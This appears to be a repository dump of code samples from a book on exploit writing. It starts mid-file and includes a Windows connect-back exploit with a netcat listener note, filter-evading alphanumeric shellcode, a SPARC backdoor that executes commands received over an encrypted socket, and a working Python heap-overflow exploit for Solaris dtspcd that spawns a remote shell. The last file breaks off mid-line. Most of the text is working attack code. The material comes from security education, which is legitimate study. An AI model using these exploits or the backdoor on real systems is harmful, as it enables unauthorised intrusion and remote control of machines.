strcat(buffer,"\xBC\xE1\xFD\x7F"); 97 | 98 | 99 | // This is our source buffer. This is the address 100 | // where we find our original buffer on the stack 101 | strcat(buffer,"\x10\xFB\x12"); 102 | 103 | // Now execute the vulnerable program! 104 | WinExec(buffer,SW_MAXIMIZE); 105 | 106 | return 0; 107 | } 108 | 109 | int StartWinsock() 110 | { 111 | int err=0; 112 | WORD wVersionRequested; 113 | WSADATA wsaData; 114 | 115 | wVersionRequested = MAKEWORD( 2, 0 ); 116 | err = WSAStartup( wVersionRequested, &wsaData ); 117 | if ( err != 0 ) 118 | return 0; 119 | if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsa-Data.wVersion ) != 0 ) 120 | { 121 | WSACleanup( ); 122 | return 0; 123 | } 124 | return 0; 125 | } 126 | int SetUpExploit(char *myip, int myport) 127 | { 128 | unsigned int ip=0; 129 | unsigned short prt=0; 130 | char *ipt=""; 131 | char *prtt=""; 132 | 133 | ip = inet_addr(myip); 134 | 135 | ipt = (char*)&ip; 136 | exploit[191]=ipt[0]; 137 | exploit[192]=ipt[1]; 138 | exploit[193]=ipt[2]; 139 | exploit[194]=ipt[3]; 140 | 141 | // set the TCP port to connect on 142 | // netcat should be listening on this port 143 | // e.g. nc -l -p 53 144 | 145 | prt = htons((unsigned short)myport); 146 | prt = prt ^ 0xFFFF; 147 | prtt = (char *) &prt; 148 | exploit[209]=prtt[0]; 149 | exploit[210]=prtt[1]; 150 | 151 | return 0; 152 | } 153 | -------------------------------------------------------------------------------- /Chapter_09/Shellcoders09codesnippet01.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 9: Overcomming Filters 10 | Code Snippet #1 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | 00401066 80 00 42 add byte ptr [eax],42h 17 | 00401069 00 6D 00 add byte ptr [ebp],ch 18 | 0040106C 40 inc eax 19 | 0040106D 00 6D 00 add byte ptr [ebp],ch 20 | 00401070 40 inc eax 21 | 00401071 00 6D 00 add byte ptr [ebp],ch 22 | 23 | -------------------------------------------------------------------------------- /Chapter_09/Shellcoders09codesnippet02.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 9: Overcomming Filters 10 | Code Snippet #2 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | 17 | 0040B55E 6A 00 push 0 18 | 0040B560 5B pop ebx 19 | 0040B564 43 inc ebx 20 | 0040B568 53 push ebx 21 | 0040B56C 54 push esp 22 | 0040B570 58 pop eax 23 | 0040B574 6B 00 39 imul eax,dword ptr [eax],39h 24 | 0040B57A 50 push eax 25 | 0040B57E 5A pop edx 26 | 0040B582 54 push esp 27 | 0040B586 58 pop eax 28 | 0040B58A 6B 00 69 imul eax,dword ptr [eax],69h 29 | 0040B590 50 push eax 30 | 0040B594 5B pop ebx 31 | 32 | -------------------------------------------------------------------------------- /Chapter_09/Shellcoders09codesnippet03.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 9: Overcomming Filters 10 | Code Snippet #3 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | 17 | 0040B5BA 54 push esp 18 | 0040B5BE 58 pop eax 19 | 0040B5C2 6B 00 41 imul eax,dword ptr [eax],41h 20 | 0040B5C5 00 41 00 add byte ptr [ecx],al 21 | 0040B5C8 41 inc ecx 22 | 0040B5CC 41 inc ecx 23 | 24 | -------------------------------------------------------------------------------- /Chapter_09/Shellcoders09codesnippet04.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 9: Overcomming Filters 10 | Code Snippet #4 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | 17 | 0040B5BA 54 push esp 18 | 0040B5BE 58 pop eax 19 | 0040B5C2 6B 00 5B imul eax,dword ptr [eax],5Bh 20 | 0040B5C5 00 41 00 add byte ptr [ecx],al 21 | 0040B5C8 46 inc esi 22 | 0040B5C9 00 51 00 add byte ptr [ecx],dl // <---- HERE 23 | 0040B5CC 41 inc ecx 24 | 0040B5D0 41 inc ecx 25 | 26 | -------------------------------------------------------------------------------- /Chapter_09/Shellcoders09codesnippet05.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 9: Overcomming Filters 10 | Code Snippet #5 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | 17 | 0040B5BA 54 push esp 18 | 0040B5BE 58 pop eax 19 | 0040B5C2 6B 00 5A imul eax,dword ptr [eax],5Ah 20 | 0040B5C5 00 41 00 add byte ptr [ecx],al 21 | 0040B5C8 46 inc esi 22 | 0040B5C9 00 59 00 add byte ptr [ecx],bl // <---- HERE 23 | 0040B5CC 41 inc ecx 24 | 0040B5D0 41 inc ecx 25 | 26 | -------------------------------------------------------------------------------- /Chapter_09/Shellcoders09codesnippet06.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 9: Overcomming Filters 10 | Code Snippet #6 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | 0040B5BA 54 push esp 17 | 0040B5BE 58 pop eax 18 | 0040B5C2 6B 00 64 imul eax,dword ptr [eax],64h 19 | 0040B5C5 00 41 00 add byte ptr [ecx],al 20 | 0040B5C8 46 inc esi 21 | 0040B5C9 00 59 00 add byte ptr [ecx],bl // <--- BL == 0x69 22 | 0040B5CC 46 inc esi 23 | 0040B5CD 00 51 00 add byte ptr [ecx],dl // <--- DL == 0x39 24 | 0040B5D0 41 inc ecx 25 | 0040B5D4 41 inc ecx 26 | 27 | -------------------------------------------------------------------------------- /Chapter_09/Shellcoders09codesnippet07.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 9: Overcomming Filters 10 | Code Snippet #7 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | 17 | 0040B5BA 54 push esp 18 | 0040B5BE 58 pop eax 19 | 0040B5C2 6B 00 41 imul eax,dword ptr [eax],41h 20 | 0040B5C5 00 41 00 add byte ptr [ecx],al 21 | 0040B5C8 41 inc ecx 22 | // NOW ECX POINTS TO THE 0x5A IN THE DESTINATION BUFFER 23 | 0040B5C9 00 59 00 add byte ptr [ecx],bl 24 | // <-- BL == 0x69 NON-null BYTE NOW EQUALS 0xC3 25 | 0040B5CC 41 inc ecx 26 | 0040B5CD 00 6D 00 add byte ptr [ebp],ch 27 | 28 | -------------------------------------------------------------------------------- /Chapter_09/Shellcoders09codesnippet08.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 9: Overcomming Filters 10 | Code Snippet #8 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | 17 | 18 | 004010B4 83 C7 23 add edi,23h 19 | 004010B7 33 C0 xor eax,eax 20 | 004010B9 33 C9 xor ecx,ecx 21 | 004010BB F7 D1 not ecx 22 | 004010BD F2 66 AF repne scas word ptr [edi] 23 | 004010C0 F7 D1 not ecx 24 | 004010C2 D1 E1 shl ecx,1 25 | 004010C4 2B F9 sub edi,ecx 26 | 004010C6 83 E9 04 sub ecx,4 27 | 004010C9 47 inc edi 28 | 29 | here: 30 | 004010CA 49 dec ecx 31 | 004010CB 8A 14 0F mov dl,dword ptr [edi+ecx] 32 | 004010CE 88 17 mov byte ptr [edi],dl 33 | 004010D0 47 inc edi 34 | 004010D1 47 inc edi 35 | 004010D2 49 dec ecx 36 | 004010D3 49 dec ecx 37 | 004010D4 49 dec ecx 38 | 004010D5 75 F3 jne here (004010ca) 39 | 40 | -------------------------------------------------------------------------------- /Chapter_09/Shellcoders09codesnippet09.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 9: Overcomming Filters 10 | Code Snippet #4 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | push eax 17 | pop ecx 18 | push 0 19 | pop eax 20 | inc eax 21 | push eax 22 | push esp 23 | pop eax 24 | imul eax,dword ptr[eax],0x00410041 25 | push eax 26 | pop ecx 27 | -------------------------------------------------------------------------------- /Chapter_09/Shellcoders09sampleprogram01.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/devzero2000/shellcoderhandbook/9da300b22f82e3b9f0888de60e6fb2a029a53a0e/Chapter_09/Shellcoders09sampleprogram01.c -------------------------------------------------------------------------------- /Chapter_09/Shellcoders09sampleprogram02.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 9: Overcomming Filters 10 | Sample Program #2 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | #include 17 | #include 18 | 19 | int main() 20 | { 21 | unsigned char 22 | RealShell-code[]="\x55\x8B\xEC\x68\x30\x30\x30\x30\x58\x8B\xE5\x5D\xC3"; 23 | unsigned int count = 0, length=0, cnt=0; 24 | unsigned char *ptr = null; 25 | unsigned char a=0,b=0; 26 | 27 | length = strlen(RealShellcode); 28 | ptr = malloc((length + 1) * 2); 29 | if(!ptr) 30 | return printf("malloc() failed.\n"); 31 | ZeroMemory(ptr,(length+1)*2); 32 | while(count < length) 33 | { 34 | a = b = RealShellcode[count]; 35 | a = a >> 4; 36 | b = b << 4; 37 | b = b >> 4; 38 | a = a + 0x41; 39 | b = b + 0x41; 40 | ptr[cnt++] = a; 41 | ptr[cnt++] = b; 42 | count ++; 43 | } 44 | strcat(ptr,"QQ"); 45 | free(ptr); 46 | return 0; 47 | } 48 | -------------------------------------------------------------------------------- /Chapter_11/Shellcoders11-BF_shell.s: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 11: Advanced Solaris Exploitation 10 | Sample Program #4 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | .section ".text" 17 | .align 4 18 | .global main 19 | .type main,#function 20 | .proc 04 21 | main: 22 | call next 23 | nop 24 | !use %i1 for SOCK 25 | next: 26 | add %o7, 0x368, %i2 !functable addr 27 | 28 | add %i2, 40, %o0 !LDSO string 29 | mov 0, %o1 30 | mov 5, %g1 !SYS_open 31 | ta 8 32 | 33 | mov %o0, %i4 !fd 34 | mov %o0, %o4 !fd 35 | mov 0, %o0 !NULL 36 | sethi %hi(16384000), %o1 !size 37 | mov 1, %o2 !PROT_READ 38 | mov 2, %o3 !MAP_PRIVATE 39 | sethi %hi(0x80000000), %g1 40 | or %g1, %o3, %o3 41 | mov 0, %o5 !offset 42 | mov 115, %g1 !SYS_mmap 43 | ta 8 44 | 45 | mov %i2, %l5 !need to store functable to temp reg 46 | mov %o0, %i5 !addr from mmap() 47 | add %i2, 64, %o1 !"_dlsym" string 48 | call find_sym 49 | nop 50 | mov %l5, %i2 !restore functable 51 | 52 | mov %o0, %i3 !location of _dlsym in ld.so.1 53 | 54 | mov %i5, %o0 !addr 55 | sethi %hi(16384000), %o1 !size 56 | mov 117, %g1 !SYS_munmap 57 | ta 8 58 | 59 | mov %i4, %o0 !fd 60 | mov 6, %g1 !SYS_close 61 | ta 8 62 | 63 | sethi %hi(0xff3b0000), %o0 !0xff3b0000 is ld.so base in every process 64 | add %i3, %o0, %i3 !address of _dlsym() 65 | st %i3, [ %i2 + 0 ] !store _dlsym() in functable 66 | 67 | mov -2, %o0 68 | add %i2, 72, %o1 !"_dlopen" string 69 | call %i3 70 | nop 71 | st %o0, [%i2 + 4] !store _dlopen() in functable 72 | 73 | mov -2, %o0 74 | add %i2, 80, %o1 !"_popen" string 75 | call %i3 76 | nop 77 | st %o0, [%i2 + 8] !store _popen() in functable 78 | 79 | mov -2, %o0 80 | add %i2, 88, %o1 !"fread" string 81 | call %i3 82 | nop 83 | st %o0, [%i2 + 12] !store fread() in functable 84 | 85 | mov -2, %o0 86 | add %i2, 96, %o1 !"fclose" string 87 | call %i3 88 | nop 89 | st %o0, [%i2 + 16] !store fclose() in functable 90 | 91 | mov -2, %o0 92 | add %i2, 104, %o1 !"strlen" string 93 | call %i3 94 | nop 95 | st %o0, [%i2 + 20] !store strlen() in functable 96 | 97 | mov -2, %o0 98 | add %i2, 112, %o1 !"memset" string 99 | call %i3 100 | nop 101 | st %o0, [%i2 + 24] !store memset() in functable 102 | 103 | 104 | ld [%i2 + 4], %o2 !_dlopen() 105 | add %i2, 120, %o0 !"/usr/local/ssl/lib/libcrypto.so" string 106 | mov 257, %o1 !RTLD_GLOBAL | RTLD_LAZY 107 | call %o2 108 | nop 109 | 110 | mov -2, %o0 111 | add %i2, 152, %o1 !"BF_set_key" string 112 | call %i3 113 | nop 114 | st %o0, [%i2 + 28] !store BF_set_key() in func-table 115 | 116 | mov -2, %o0 117 | add %i2, 168, %o1 !"BF_cfb64_encrypt" string 118 | call %i3 !call _dlsym() 119 | nop 120 | st %o0, [%i2 + 32] !store BF_cfb64_encrypt() in functable 121 | 122 | !BF_set_key(&BF_KEY, 64, &KEY); 123 | !this API overwrites %g2 and %g3 124 | !take care! 125 | add %i2, 0xc8, %o2 ! KEY 126 | mov 64, %o1 ! 64 127 | add %i2, 0x110, %o0 ! BF_KEY 128 | ld [%i2 + 28], %o3 ! BF_set_key() pointer 129 | call %o3 130 | nop 131 | 132 | while_loop: 133 | 134 | mov %i1, %o0 !SOCKET 135 | sethi %hi(8192), %o2 136 | 137 | !reserve some space 138 | sethi %hi(0x2000), %l1 139 | add %i2, %l1, %i4 ! somewhere after BF_KEY 140 | 141 | mov %i4, %o1 ! read buffer in %i4 142 | mov 3, %g1 ! SYS_read 143 | ta 8 144 | 145 | cmp %o0, -1 !len returned from read() 146 | bne proxy 147 | nop 148 | b error_out !-1 returned exit process 149 | nop 150 | 151 | proxy: 152 | !BF_cfb64_encrypt(in, out, strlen(in), &key, ivec, &num, enc); DE-CRYPT 153 | mov %o0, %o2 ! length of in 154 | mov %i4, %o0 ! in 155 | sethi %hi(0x2060), %l1 156 | add %i4, %l1, %i5 !duplicate of out 157 | add %i4, %l1, %o1 ! out 158 | add %i2, 0x110, %o3 ! key 159 | sub %o1, 0x40, %o4 ! ivec 160 | st %g0, [%o4] ! ivec = 0 161 | sub %o1, 0x8, %o5 ! &num 162 | st %g0, [%o5] ! num = 0 163 | !hmm stack stuff..... put enc [%sp + XX] 164 | st %g0, [%sp+92] !BF_DECRYPT 0 165 | ld [%i2 + 32], %l1 ! BF_cfb64_encrypt() pointer 166 | call %l1 167 | nop 168 | 169 | mov %i5, %o0 ! read buffer 170 | add %i2, 192, %o1 ! "rw" string 171 | ld [%i2 + 8], %o2 ! _popen() pointer 172 | call %o2 173 | nop 174 | 175 | mov %o0, %i3 ! store FILE *fp 176 | 177 | mov %i4, %o0 ! buf 178 | sethi %hi(8192), %o1 ! 8192 179 | mov 1, %o2 ! 1 180 | mov %i3, %o3 ! fp 181 | ld [%i2 + 12], %o4 ! fread() pointer 182 | call %o4 183 | nop 184 | 185 | mov %i4, %o0 !buf 186 | ld [%i2 + 20], %o1 !strlen() pointer 187 | call %o1, 0 188 | nop 189 | 190 | !BF_cfb64_encrypt(in, out, strlen(in), &key, ivec, &num, enc); EN-CRYPT 191 | mov %o0, %o2 ! length of in 192 | mov %i4, %o0 ! in 193 | mov %o2, %i0 ! store length for write(.., len) 194 | mov %i5, %o1 ! out 195 | add %i2, 0x110, %o3 ! key 196 | sub %i5, 0x40, %o4 ! ivec 197 | st %g0, [%o4] ! ivec = 0 198 | sub %i5, 0x8, %o5 ! &num 199 | st %g0, [%o5] ! num = 0 200 | !hmm stack shit..... put enc [%sp + 92] 201 | mov 1, %l1 202 | st %l1, [%sp+92] !BF_ENCRYPT 1 203 | ld [%i2 + 32], %l1 ! BF_cfb64_encrypt() pointer 204 | call %l1 205 | nop 206 | 207 | mov %i0, %o2 !len to write() 208 | mov %i1, %o0 !SOCKET 209 | mov %i5, %o1 !buf 210 | mov 4, %g1 !SYS_write 211 | ta 8 212 | 213 | mov %i4, %o0 !buf 214 | mov 0, %o1 !0x00 215 | sethi %hi(8192), %o2 216 | or %o2, 8, %o2 !8192 217 | ld [%i2 + 24], %o3 !memset() pointer 218 | call %o3, 0 219 | nop 220 | 221 | mov %i3, %o0 222 | ld [%i2 + 16], %o1 !fclose() pointer 223 | call %o1, 0 224 | nop 225 | 226 | b while_loop 227 | nop 228 | 229 | error_out: 230 | mov 0, %o0 231 | mov 1, %g1 !SYS_exit 232 | ta 8 233 | 234 | ! following assembly code is extracted from the -fPIC (position inde-pendent) 235 | ! compiled version of the C code presented in this section. 236 | ! refer to find_sym.c for explanation of the following assembly routine. 237 | find_sym: 238 | ld [%o0 + 32], %g3 239 | clr %o2 240 | lduh [%o0 + 48], %g2 241 | add %o0, %g3, %g3 242 | ba f1 243 | cmp %o2, %g2 244 | f3: 245 | add %o2, 1, %o2 246 | cmp %o2, %g2 247 | add %g3, 40, %g3 248 | f1: 249 | bge f2 250 | sll %o5, 2, %g2 251 | ld [%g3 + 4], %g2 252 | cmp %g2, 11 253 | bne,a f3 254 | lduh [%o0 + 48], %g2 255 | ld [%g3 + 24], %o5 256 | ld [%g3 + 12], %o3 257 | sll %o5, 2, %g2 258 | f2: 259 | ld [%o0 + 32], %g3 260 | add %g2, %o5, %g2 261 | sll %g2, 3, %g2 262 | add %o0, %g3, %g3 263 | add %g3, %g2, %g3 264 | ld [%g3 + 12], %o5 265 | and %o0, -4, %g2 266 | add %o3, %g2, %o4 267 | add %o5, %g2, %o5 268 | f5: 269 | add %o4, 16, %o4 270 | f4: 271 | ldub [%o4 + 12], %g2 272 | and %g2, 15, %g2 273 | cmp %g2, 2 274 | bne,a f4 275 | add %o4, 16, %o4 276 | ld [%o4], %g2 277 | mov %o1, %o2 278 | ldsb [%o2], %g3 279 | add %o5, %g2, %o3 280 | ldsb [%o5 + %g2], %o0 281 | cmp %o0, %g3 282 | bne f5 283 | add %o2, 1, %o2 284 | ldsb [%o3], %g2 285 | f7: 286 | cmp %g2, 0 287 | be f6 288 | add %o3, 1, %o3 289 | ldsb [%o2], %g3 290 | ldsb [%o3], %g2 291 | cmp %g2, %g3 292 | be f7 293 | add %o2, 1, %o2 294 | ba f4 295 | add %o4, 16, %o4 296 | f6: 297 | jmp %o7 + 8 298 | ld [%o4 + 4], %o0 299 | functable: 300 | .word 0xbabebab0 !_dlsym 301 | .word 0xbabebab1 !_dlopen 302 | .word 0xbabebab2 !_popen 303 | .word 0xbabebab3 !fread 304 | .word 0xbabebab4 !fclose 305 | .word 0xbabebab5 !strlen 306 | .word 0xbabebab6 !memset 307 | .word 0xbabebab7 !BF_set_key 308 | .word 0xbabebab8 !BF_cfb64_encrypt 309 | .word 0xffffffff 310 | 311 | LDSO: 312 | .asciz "/usr/lib/ld.so.1" 313 | .align 8 314 | DLSYM: 315 | .asciz "_dlsym" 316 | .align 8 317 | DLOPEN: 318 | .asciz "_dlopen" 319 | .align 8 320 | POPEN: 321 | .asciz "_popen" 322 | .align 8 323 | FREAD: 324 | .asciz "fread" 325 | .align 8 326 | FCLOSE: 327 | .asciz "fclose" 328 | .align 8 329 | STRLEN: 330 | .asciz "strlen" 331 | .align 8 332 | MEMSET: 333 | .asciz "memset" 334 | .align 8 335 | LIBCRYPTO: 336 | .asciz "/usr/local/ssl/lib/libcrypto.so" 337 | .align 8 338 | BFSETKEY: 339 | .asciz "BF_set_key" 340 | .align 8 341 | BFENCRYPT: 342 | .asciz "BF_cfb64_encrypt" 343 | .align 8 344 | RW: 345 | .asciz "rw" 346 | .align 8 347 | KEY: 348 | .asciz 349 | "6fa1d67f32d67d25a31ee78e487507224ddcc968743a9cb81c912a78ae0a0ea9" 350 | .align 8 351 | BF_KEY: 352 | .asciz "12341234" !BF_KEY storage, actually its way larger 353 | .align 8 354 | -------------------------------------------------------------------------------- /Chapter_11/Shellcoders11-dtspcd-exploit.py: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 11: Advanced Solaris Exploitation 10 | Sample Program #2 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | # noir@olympos.org || noir@uberhax0r.net 17 | # Sinan Eren (c) 2004 18 | # dtspcd heap overflow 19 | 20 | import socket 21 | import telnetlib 22 | import sys 23 | import string 24 | import struct 25 | import time 26 | import threading 27 | import random 28 | 29 | PORT = "6112" 30 | CHANNEL_ID = 2 31 | SPC_ABORT = 3 32 | SPC_REGISTER = 4 33 | 34 | 35 | class DTSPCDException(Exception): 36 | 37 | def __init__(self, args=None): 38 | self.args = args 39 | 40 | def __str__(self): 41 | return `self.args` 42 | 43 | class DTSPCDClient: 44 | 45 | def __init__(self): 46 | self.seq = 1 47 | 48 | def spc_register(self, user, buf): 49 | return "4 " + "\x00" + user + "\x00\x00" + "10" + "\x00" + buf 50 | 51 | def spc_write(self, buf, cmd): 52 | self.data = "%08x%02x%04x%04x " % (CHANNEL_ID, cmd, len(buf), self.seq) 53 | self.seq += 1 54 | self.data += buf 55 | if self.sck.send(self.data) < len(self.data): 56 | raise DTSPCDException, "network problem, packet not fully send" 57 | 58 | def spc_read(self): 59 | 60 | self.recvbuf = self.sck.recv(20) 61 | 62 | if len(self.recvbuf) < 20: 63 | raise DTSPCDException, "network problem, packet not fully recvied" 64 | 65 | self.chan = string.atol(self.recvbuf[:8], 16) 66 | self.cmd = string.atol(self.recvbuf[8:10], 16) 67 | self.mbl = string.atol(self.recvbuf[10:14], 16) 68 | self.seqrecv = string.atol(self.recvbuf[14:18], 16) 69 | 70 | #print "chan, cmd, len, seq: " , self.chan, self.cmd, self.mbl, self.seqrecv 71 | 72 | self.recvbuf = self.sck.recv(self.mbl) 73 | 74 | if len(self.recvbuf) < self.mbl: 75 | raise DTSPCDException, "network problem, packet not fully recvied" 76 | 77 | return self.recvbuf 78 | 79 | 80 | class DTSPCDExploit(DTSPCDClient): 81 | 82 | def __init__(self, target, user="", port=PORT): 83 | self.user = user 84 | self.set_target(target) 85 | self.set_port(port) 86 | DTSPCDClient.__init__(self) 87 | 88 | #shellcode: write(0, "/bin/ksh", 8) + fcntl(0, F_DUP2FD, 0-1-2) + exec("/bin/ksh"...) 89 | self.shellcode =\ 90 | "\xa4\x1c\x40\x11"+\ 91 | "\xa4\x1c\x40\x11"+\ 92 | "\xa4\x1c\x40\x11"+\ 93 | "\xa4\x1c\x40\x11"+\ 94 | "\xa4\x1c\x40\x11"+\ 95 | "\xa4\x1c\x40\x11"+\ 96 | "\x20\xbf\xff\xff"+\ 97 | "\x20\xbf\xff\xff"+\ 98 | "\x7f\xff\xff\xff"+\ 99 | "\xa2\x1c\x40\x11"+\ 100 | "\x90\x24\x40\x11"+\ 101 | "\x92\x10\x20\x09"+\ 102 | "\x94\x0c\x40\x11"+\ 103 | "\x82\x10\x20\x3e"+\ 104 | "\x91\xd0\x20\x08"+\ 105 | "\xa2\x04\x60\x01"+\ 106 | "\x80\xa4\x60\x02"+\ 107 | "\x04\xbf\xff\xfa"+\ 108 | "\x90\x23\xc0\x0f"+\ 109 | "\x92\x03\xe0\x58"+\ 110 | "\x94\x10\x20\x08"+\ 111 | "\x82\x10\x20\x04"+\ 112 | "\x91\xd0\x20\x08"+\ 113 | "\x90\x03\xe0\x58"+\ 114 | "\x92\x02\x20\x10"+\ 115 | "\xc0\x22\x20\x08"+\ 116 | "\xd0\x22\x20\x10"+\ 117 | "\xc0\x22\x20\x14"+\ 118 | "\x82\x10\x20\x0b"+\ 119 | "\x91\xd0\x20\x08"+\ 120 | "\x2f\x62\x69\x6e"+\ 121 | "\x2f\x6b\x73\x68" 122 | 123 | def set_user(self, user): 124 | self.user = user 125 | 126 | def get_user(self): 127 | return self.user 128 | 129 | def set_target(self, target): 130 | try: 131 | self.target = socket.gethostbyname(target) 132 | except socket.gaierror, err: 133 | raise DTSPCDException, "DTSPCDExploit, Host: " + target + " " + err[1] 134 | 135 | def get_target(self): 136 | return self.target 137 | 138 | def set_port(self, port): 139 | self.port = string.atoi(port) 140 | 141 | def get_port(self): 142 | return self.port 143 | 144 | def get_uname(self): 145 | 146 | self.setup() 147 | 148 | self.uname_d = { "hostname": "", "os": "", "version": "", "arch": "" } 149 | 150 | self.spc_write(self.spc_register("root", "\x00"), SPC_REGISTER) 151 | 152 | self.resp = self.spc_read() 153 | 154 | try: 155 | self.resp = self.resp[self.resp.index("1000")+5:len(self.resp)-1] 156 | except ValueError: 157 | raise DTSPCDException, "Non standart response to REGISTER cmd" 158 | 159 | self.resp = self.resp.split(":") 160 | 161 | self.uname_d = { "hostname": self.resp[0],\ 162 | "os": self.resp[1],\ 163 | "version": self.resp[2],\ 164 | "arch": self.resp[3] } 165 | print self.uname_d 166 | 167 | self.spc_write("", SPC_ABORT) 168 | 169 | self.sck.close() 170 | 171 | def setup(self): 172 | 173 | try: 174 | self.sck = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP) 175 | self.sck.connect((self.target, self.port)) 176 | except socket.error, err: 177 | raise DTSPCDException, "DTSPCDExploit, Host: " + str(self.target) + ":"\ 178 | + str(self.port) + " " + err[1] 179 | 180 | def exploit(self, retloc, retaddr): 181 | 182 | self.setup() 183 | 184 | self.ovf = "\xa4\x1c\x40\x11\x20\xbf\xff\xff" * ((4096 - 8 - len(self.shellcode)) / 8) 185 | 186 | self.ovf += self.shellcode + "\x00\x00\x10\x3e" + "\x00\x00\x00\x14" +\ 187 | "\x12\x12\x12\x12" + "\xff\xff\xff\xff" + "\x00\x00\x0f\xf4" +\ 188 | self.get_chunk(retloc, retaddr) 189 | self.ovf += "A" * ((0x103e - 8) - len(self.ovf)) 190 | 191 | #raw_input("attach") 192 | 193 | self.spc_write(self.spc_register("", self.ovf), SPC_REGISTER) 194 | 195 | time.sleep(0.1) 196 | self.check_bd() 197 | 198 | #self.spc_write("", SPC_ABORT) 199 | 200 | self.sck.close() 201 | 202 | def get_chunk(self, retloc, retaddr): 203 | 204 | return "\x12\x12\x12\x12" + struct.pack(">l", retaddr) +\ 205 | "\x23\x23\x23\x23" + "\xff\xff\xff\xff" +\ 206 | "\x34\x34\x34\x34" + "\x45\x45\x45\x45" +\ 207 | "\x56\x56\x56\x56" + struct.pack(">l", (retloc - 8)) 208 | 209 | def attack(self): 210 | 211 | print "[*] retrieving remote version [*]" 212 | self.get_uname() 213 | print "[*] exploiting 